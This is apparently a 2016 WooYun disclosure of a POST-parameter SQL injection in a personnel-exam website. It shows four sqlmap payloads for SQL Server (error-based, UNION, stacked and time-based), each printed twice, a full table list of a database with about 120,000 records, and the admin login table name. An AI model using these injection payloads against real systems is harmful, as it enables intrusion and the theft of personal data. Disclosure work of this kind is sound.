当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168794

漏洞标题:某人事考试post类型sql注入

相关厂商:某人事考试

漏洞作者: 嗯_然后呢

提交时间:2016-01-13 16:35

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:19

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

某人事考试post类型sql注入12万信息泄露

详细说明:

QQ截图20160107132226.jpg

QQ截图20160110011154.jpg


js过滤
放到burp里面检测下

QQ截图20160110011334.jpg


出错了
抓到的包放到sqlmap里面

Place: POST
Parameter: xmtxt
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' AND 5271=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (5271=5271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58))) AND 'bbYT'='bbYT&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)+CHAR(74)+CHAR(109)+CHAR(69)+CHAR(108)+CHAR(70)+CHAR(71)+CHAR(78)+CHAR(118)+CHAR(114)+CHAR(79)+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58)-- &zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����'; WAITFOR DELAY '0:0:5';--&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' WAITFOR DELAY '0:0:5'--&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ
---

漏洞证明:

Place: POST
Parameter: xmtxt
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' AND 5271=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (5271=5271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58))) AND 'bbYT'='bbYT&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)+CHAR(74)+CHAR(109)+CHAR(69)+CHAR(108)+CHAR(70)+CHAR(71)+CHAR(78)+CHAR(118)+CHAR(114)+CHAR(79)+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58)-- &zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����'; WAITFOR DELAY '0:0:5';--&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' WAITFOR DELAY '0:0:5'--&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ
---


当时忘记截图了=-=

Database: chinaexamcj
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| dbo.dhjm1                 | 121137  |
| dbo.dh0609                | 119579  |
| dbo.mm                    | 119541  |
| dbo.dhjm                  | 86390   |
| dbo.dh0608                | 14774   |
| dbo.dh0607                | 12176   |
| dbo.ly_view_gwyResult     | 4410    |
| dbo.ly_view_codeitem      | 2443    |
| dbo.SR_CodeItem           | 2440    |
| dbo.ly_view_codeitemPre   | 2397    |
| dbo.web_Gwy_ZwZy          | 2395    |
| dbo.ly_view_codeitem2     | 2363    |
| dbo.web_GWY_Extra         | 2205    |
| dbo.dhbz                  | 1944    |
| dbo.kd05                  | 1200    |
| dbo.cj01201409            | 703     |
| dbo.cj02201505            | 500     |
| dbo.SM_Log                | 286     |
| dbo.SR_BuiltItem          | 125     |
| dbo.web_SR_ExamCode       | 117     |
| dbo.SR_SourceItem         | 107     |
| dbo.ly_sr_viewBItemt      | 98      |
| dbo.ly_sr_viewBItem       | 89      |
| dbo.ly_sr_viewBItem_old   | 89      |
| dbo.web_SR_CodeItem       | 86      |
| dbo.ly_view_examSys       | 79      |
| dbo.web_tbl_menu          | 71      |
| dbo.Sr_ReLog              | 50      |
| dbo.sr_SDKSAud            | 49      |
| dbo.Sr_WjType             | 48      |
| dbo.web_tbl_log           | 42      |
| dbo.SR_AppModal           | 41      |
| dbo.sr_map                | 41      |
| dbo.SR_BmInputSet         | 33      |
| dbo.Sr_NHcode             | 32      |
| dbo.Fld_View              | 25      |
| dbo.web_tbl_ac_power      | 17      |
| dbo.Sr_Nx                 | 16      |
| dbo.WEB_SR_examInfo       | 16      |
| dbo.sr_BuiltExamReg       | 15      |
| dbo.web_tbl_menuFlow      | 13      |
| dbo.Results               | 11      |
| dbo.SR_CodeCollectSys     | 11      |
| dbo.Fld                   | 10      |
| dbo.SR_CodeCollect        | 10      |
| dbo.web_tbl_config_system | 10      |
| dbo.ly_view_menu          | 9       |
| dbo.SR_ExamWork           | 9       |
| dbo.web_tbl_act_system    | 9       |
| dbo.cfl_view_ShenHe       | 8       |
| dbo.web_exam_AudCode      | 8       |
| dbo.Web_KsRegister        | 8       |
| dbo.web_ShenHe            | 8       |
| dbo.dtproperties          | 7       |
| dbo.ly_view_login         | 7       |
| dbo.Prj_Import            | 7       |
| dbo.SR_BuiltCollect       | 7       |
| dbo.SR_RptFldItem         | 7       |
| dbo.SR_SourceCollect      | 7       |
| dbo.web_SR_examList       | 7       |
| dbo.web_sr_report         | 7       |
| dbo.web_tbl_login         | 7       |
| dbo.ly_view_groupTree     | 6       |
| dbo.web_tbl_rule          | 6       |
| dbo.ZwMsYS                | 6       |
| dbo.ly_view_examInfo      | 5       |
| dbo.sr_BuiltExamRegDate   | 5       |
| dbo.Sr_WjDispose          | 5       |
| dbo.EI_ExamTreeDesc       | 4       |
| dbo.ly_view_setTable      | 4       |
| dbo.Web_KsFlow            | 4       |
| dbo.WEB_SR_SetTable       | 4       |
| dbo.WEB_SR_SetTime        | 4       |
| dbo.web_tbl_group         | 4       |
| dbo.AMEDIA01              | 3       |
| dbo.cfl_cjcx_examlist     | 3       |
| dbo.EI_SubjectDesc        | 3       |
| dbo.Hmc_Font              | 3       |
| dbo.ly_view_examDate      | 3       |
| dbo.ly_view_examDate2     | 3       |
| dbo.ly_view_JgBuilt       | 3       |
| dbo.ly_view_srEexamFy     | 3       |
| dbo.SR_CardReprot         | 3       |
| dbo.SR_JgBuilt            | 3       |
| dbo.sr_SjbhGz             | 3       |
| dbo.web_cjcard            | 3       |
| dbo.web_SR_examFY         | 3       |
| dbo.ZwMsSet               | 3       |
| dbo.Kc_TdbGridWidth       | 2       |
| dbo.Sr_ZwAddFs            | 2       |
| dbo.web_cjcx_examlist     | 2       |
| dbo.web_exam_AudFlow      | 2       |
| dbo.web_sr_netPay         | 2       |
| dbo.web_tbl_group_system  | 2       |
| dbo.MQ_VIEW_ExamInf       | 1       |
| dbo.MQ_VIEW_Jg            | 1       |
| dbo.SR_KcTj               | 1       |
| dbo.SR_KcTj1              | 1       |
| dbo.sr_ksList             | 1       |
| dbo.sr_ksListAll          | 1       |
| dbo.Sr_SerialNo           | 1       |
| dbo.SR_SetTime            | 1       |
| dbo.SR_StartExam          | 1       |
| dbo.sysdiagrams           | 1       |
| dbo.TT_Jgkd               | 1       |
| dbo.tt_kdjg               | 1       |
| dbo.TT_KsSj               | 1       |
| dbo.TT_Ksxx               | 1       |
| dbo.TT_Subject            | 1       |
| dbo.TT_Zykm               | 1       |
| dbo.Web_kqzw              | 1       |
+---------------------------+---------+


管理员表dbo.web_tbl_login

QQ截图20160110012402.jpg


不知道是什么加密方式____朋友说是AEC还是什么的>_<
后台地址:http://**.**.**.**/Manage/Default.aspx
这洞还行吧_给我新手一个机会___求过啊!

修复方案:

别用js验证了呃呃呃我也不太懂
嗯就这样

版权声明:转载请注明来源 嗯_然后呢@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-15 15:51

厂商回复:

CNVD确认未复现所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价